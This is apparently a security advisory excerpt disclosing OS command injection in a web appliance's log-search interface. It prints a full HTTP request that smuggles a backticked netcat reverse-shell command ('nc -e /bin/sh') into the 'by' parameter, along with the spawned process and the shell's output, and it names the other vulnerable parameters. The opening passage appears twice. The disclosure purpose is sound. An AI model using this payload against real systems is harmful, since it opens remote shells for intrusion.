Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 305 Connection: close STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1 HTTP/1.1 200 OK Date: Tue, 10 May 2016 15:35:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate,...
Multiple parameters to the web interface are unsafely handled and can be used to run operating system commands, such as: POST /index.php?c=logs HTTP/1.1 Host: [redacted] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br DNT: 1 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.6.1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Length: 305 Connection: close STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1 HTTP/1.1 200 OK Date: Tue, 10 May 2016 15:35:05 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0 Pragma: no-cache X-Frame-Options: sameorigin X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 207 {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10 4:35 PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"} The vulnerable parameters are: by, request_id, and txt_filter_domain That request launches the following process on the SWA: 1000 16851 0.0 0.0 2728 1040 ? S 15:43 0:00 sh -c /opt/perl/bin/salp-generate-report.pl --report=Filter --res=- --type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action='' --sid=590fca17b230e8cdba0394cfa28ef2eb From the shell launched via netcat: id;uname -a;uptime uid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx) Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux 15:52:34 up 4:26, 0 users, load average: 0.11, 0.12, 0.15
